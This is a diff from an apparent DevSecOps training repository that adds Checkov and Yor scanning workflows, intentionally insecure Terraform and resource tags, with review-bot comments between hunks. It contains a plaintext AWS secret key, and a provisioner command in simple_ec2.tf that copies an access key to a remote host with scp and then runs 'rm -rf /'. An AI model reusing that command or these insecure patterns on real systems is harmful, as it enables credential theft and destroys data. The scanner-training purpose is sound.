diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml new file mode 100644 index 000000000..10ac4d279 --- /dev/null +++ b/.github/workflows/checkov.yaml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v3 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..1050790d4 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main diff --git a/code/build/gcs.tf b/code/build/gcs.tf new file mode 100644 index 000000000..04735b606 --- /dev/null +++ b/code/build/gcs.tf 
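Review bot: In the checkov.yaml hunk, `uses: bridgecrewio/checkov-action@master` pulls a mutable branch of a third-party action on every push to main and every pull request, so whatever lands on that branch (or a compromised upstream) runs in this repo's job with `security-events: write`. Pin it to a full commit SHA with the version as a trailing comment, e.g. `uses: bridgecrewio/checkov-action@<full-commit-sha>  # vX.Y.Z`, and let Dependabot/Renovate bump the pin. The same hunk mixes `actions/checkout@v2` with `upload-sarif@v3`; v2 of checkout is an old Node 12-era major and should move to a current, SHA-pinned release as well. The `if: success() || failure()` gate is correct for getting SARIF uploaded when checkov fails; leave `soft_fail` commented out so findings still fail the check.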
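Review bot: The yor.yaml hunk grants `contents: write` to a job that runs `bridgecrewio/yor-action@main`, an unpinned branch ref, on every `push` to any branch and on every `pull_request`; a malicious or simply drifting `main` of that action would execute with a token able to push commits to this repository. Pin the action to a full commit SHA (and `actions/checkout@v2` to a current pinned release) before granting write access. Consider also narrowing the trigger, e.g. `push: branches: [main]` as checkov.yaml does, since tagging every feature-branch push with a write token widens the window and, for pull requests from forks, the token is read-only anyway so the auto-commit step presumably fails there. A comment on the `permissions` block explaining that `contents: write` exists only so yor can commit tag changes would help the next reader.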
@@ -0,0 +1,32 @@ +provider "google" { + project = "qwiklabs-gcp-03-fa7edfd03d8e" + region = "us-central1" +} + +resource "google_storage_bucket" "Example" { + name = "demo2-${random_id.Rand_suffix.hex}" + location = "us-central1" + force_destroy = true + + uniform_bucket_level_access = false + + labels = { + git_commit = "8b01968a3ab2b9a1c8f4f38b1d51f999c85df31d" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-07-26-48" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "f1afb72e-2fec-49e9-bd3f-03fef6f3075a" + } +} + +resource "random_id" "Rand_suffix" { + byte_length = 4 +} + +output "Bucket_name" { + value = google_storage_bucket.Example.name +} diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..93acd2175 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "
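Review bot: The new `google_storage_bucket.Example` in gcs.tf sets `uniform_bucket_level_access = false`, which keeps legacy per-object ACLs enabled, has no `public_access_prevention`, no versioning, and `force_destroy = true` on a bucket whose contents are unknown; checkov will flag at least the first of these. If the bucket is not meant as a deliberate workshop finding, change it to `uniform_bucket_level_access = true` and add `public_access_prevention = "enforced"` next to it. The `provider "google"` block also hard-codes `project = "qwiklabs-gcp-03-fa7edfd03d8e"`, which looks like an ephemeral lab project; a `variable "project"` with no default is safer than baking a project id into committed IaC. If the insecure settings are intentional for the workshop, a `# workshop: intentionally insecure` comment on those lines would stop reviewers and scanners from "fixing" them.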

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "900a5a4e-d50a-489d-bca1-cb5d0388451d" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "c0d5f6d7-73b0-4605-830f-9322f4e0821f" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "0edc82cd-9a76-40b4-b3cf-84103c5e1be3" + } } resource "aws_volume_attachment" "ebs_att" { 
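Review bot: The tag blocks this hunk adds write a committer e-mail address, `git_last_modified_by = "tprendervill@paloaltonetworks.com"`, into AWS resource tags, which are readable by any principal with `ec2:DescribeTags`/`tag:GetResources` and are exported into billing and cost reports; that is personal data leaving the repo into a much wider audience. Yor can be told to omit that key (its skip-tags option, `skip_tags` on the action if I recall the input name correctly), or the tags could carry only the `yor_trace`/`git_commit` pair needed for traceability. Separately, the surrounding context of this hunk shows the `web_host` user_data exporting `AWS_SECRET_ACCESS_KEY` in plaintext; the tagging pass leaves it in place, so unless this is intentional workshop bait the key should be treated as exposed, rotated and removed. The `aws_instance` block whose user_data is shown starts above the hunk.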
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "bae57cc2-b69a-42f7-b161-4604df0db619" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "3b7b6467-c268-46f4-b137-c922181a1624" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "e792eebf-4140-4079-ba8f-f93196c0c337" + } } resource "aws_subnet" "web_subnet2" { 
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "59d7c428-1542-4c3f-a18e-5ef39b8885d1" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "ba67901a-5f34-41d2-94de-c110406976ab" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2d2cd15f-db35-4960-9ba9-0db40418264e" + } } resource "aws_route_table_association" "rtbassoc" { 
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "f5d866ee-a9a6-49f2-b696-62ddb36586ba" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "3ab0449c-0b40-4e2e-bebc-ff0e6693d198" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "5384bbb2-d0a0-42ae-8242-bc57d3f53478" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..9e98e908b 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf 
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "86be4da9-9dc4-4076-97f3-71f27a53527f" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "4bd48f6a-eb4e-497f-a60c-1ab271bf58ee" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "cf47b06d-08b4-4bfb-afb9-812a0f6fbf1b" + } } resource "aws_s3_bucket" "operations" { 
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "9d2680ec-dfcf-4fa7-9a3b-dec5a0798663" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "91c489e8-1eea-4254-aa8d-21fd7b728ff5" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "032fca23-6c94-479d-8710-5102342f5773" + } } diff --git a/code/s33.tf b/code/s33.tf new file mode 100644 index 000000000..9961794d1 --- /dev/null +++ b/code/s33.tf 
@@ -0,0 +1,27 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + yor_name = "dev_s3" + yor_trace = "46510630-5abb-42ff-9093-1ba6316afb99" + git_commit = "d45bb668208a5be396137f91008a9bcc52921522" + git_file = "code/s33.tf" + git_last_modified_at = "2025-08-13 01:34:25" + git_last_modified_by = "52453932+danielma911@users.noreply.github.com" + git_modifiers = "52453932+danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..117a39ed8 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "e99b073b-44b2-4c8b-8873-40b6d6d16493" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..fa5953c36 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf 
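Review bot: The new file code/s33.tf declares `resource "aws_s3_bucket" "dev_s3"`, and the simple_s3.tf hunk further down shows the same address `aws_s3_bucket.dev_s3` already exists in code/simple_s3.tf; if `code/` is initialised as a single Terraform module, `terraform validate` will reject the duplicate resource definition, and the second unaliased `provider "aws"` block added here is likely to collide with whatever provider configuration deployment_ec2.tf relies on via `var.region`. Rename the resource (e.g. `resource "aws_s3_bucket" "dev_s3_ownership"`) and update the `aws_s3_bucket_ownership_controls` reference, and drop the provider block unless this file is meant to be applied as its own root module. The bucket also gets ownership controls but no `aws_s3_bucket_public_access_block`, server-side encryption or versioning resource; if those omissions are intended as scanner findings for the workshop, say so in a comment.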
@@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "10f1637f-e216-4692-876e-2faa60a3329e" } }